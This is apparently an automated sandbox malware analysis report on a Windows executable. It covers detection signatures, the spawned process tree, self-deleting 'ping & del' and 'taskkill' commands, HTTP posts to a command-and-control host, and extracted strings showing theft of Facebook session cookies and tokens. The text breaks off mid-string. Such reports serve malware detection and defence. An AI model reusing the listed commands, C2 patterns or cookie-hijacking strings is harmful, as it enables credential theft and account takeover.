Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Cyfj6XGbkd

Overview

General Information

Sample Name:Cyfj6XGbkd (renamed file extension from none to exe)
Analysis ID:346134
MD5:63204eb716c856723a010747d58a6b00
SHA1:7e97f00b4c3580cedee02c448ac9aeb54afefbd2
SHA256:6d2db66a98ec5730bdcbc41dc7c78210fe24fe48bf7e44b59ab01c2084900456

Most interesting Screenshot:

Detection

Score:93
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

Startup

  • System is w10x64
  • Cyfj6XGbkd.exe (PID: 1676 cmdline: 'C:\Users\user\Desktop\Cyfj6XGbkd.exe' MD5: 63204EB716C856723A010747D58A6B00)
    • msiexec.exe (PID: 4828 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • 56BB1610C0318054.exe (PID: 476 cmdline: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01 MD5: 63204EB716C856723A010747D58A6B00)
      • 1611970637183.exe (PID: 6028 cmdline: 'C:\Users\user\AppData\Roaming\1611970637183.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970637183.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)
      • ThunderFW.exe (PID: 7156 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)
      • cmd.exe (PID: 6236 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 4248 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • 56BB1610C0318054.exe (PID: 576 cmdline: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01 MD5: 63204EB716C856723A010747D58A6B00)
      • cmd.exe (PID: 6012 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 5740 cmdline: taskkill /f /im chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • cmd.exe (PID: 6752 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 6624 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • cmd.exe (PID: 6336 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6452 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
  • msiexec.exe (PID: 4584 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C6BE2003C858D11BE040843C2C46EAA2 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.366076006.00000000025E0000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000002.00000002.413908813.0000000002810000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000004.00000002.378006718.0000000002560000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

SourceRuleDescriptionAuthorStrings
0.2.Cyfj6XGbkd.exe.25e0000.5.raw.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.56BB1610C0318054.exe.2560000.3.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.56BB1610C0318054.exe.10000000.7.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.56BB1610C0318054.exe.2810000.5.raw.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
0.2.Cyfj6XGbkd.exe.10000000.6.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
Click to see the 7 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeMetadefender: Detection: 24%Perma Link
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeReversingLabs: Detection: 58%
Multi AV Scanner detection for submitted fileShow sources
Source: Cyfj6XGbkd.exeVirustotal: Detection: 40%Perma Link
Source: Cyfj6XGbkd.exeMetadefender: Detection: 24%Perma Link
Source: Cyfj6XGbkd.exeReversingLabs: Detection: 58%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: Cyfj6XGbkd.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,

Compliance:

barindex
Detected unpacking (creates a PE file in dynamic memory)Show sources
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeUnpacked PE file: 2.2.56BB1610C0318054.exe.2810000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeUnpacked PE file: 4.2.56BB1610C0318054.exe.2560000.3.unpack
Uses 32bit PE filesShow sources
Source: Cyfj6XGbkd.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Uses new MSVCR DllsShow sources
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Binary contains paths to debug symbolsShow sources
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611970637183.exe, 00000009.00000000.372796373.000000000040F000.00000002.00020000.sdmp, 1611970637183.exe.2.dr
Source: Binary string: atl71.pdbT source: atl71.dll.2.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_user.dll.2.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_user.pdb source: download_user.dll.2.dr
Source: Binary string: atl71.pdb source: atl71.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000012.00000000.397410202.000000000099C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSIDCDD.tmp.1.dr
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: z:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: x:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: v:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: t:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: r:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: p:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: n:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: l:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: j:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: h:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: f:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: b:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: y:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: w:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: u:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: s:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: q:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: o:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: m:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: k:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: i:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: g:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: e:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: c:
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: a:
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\

Networking:

barindex
Uses ping.exe to check the status of other devices and networksShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global trafficHTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: 84CFBA021A5A6662.xyzAccept: */*
Source: global trafficHTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 82Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 677Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 1393Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: 84CFBA021A5A6662.xyzAccept: */*
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: Cyfj6XGbkd.exeString found in binary or memory: &AboutZwww.VB-CABLE.com web site[News are on Facebook ! equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exeString found in binary or memory: _time":"13245952903455635","lastpingday":"13245947457776957","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: 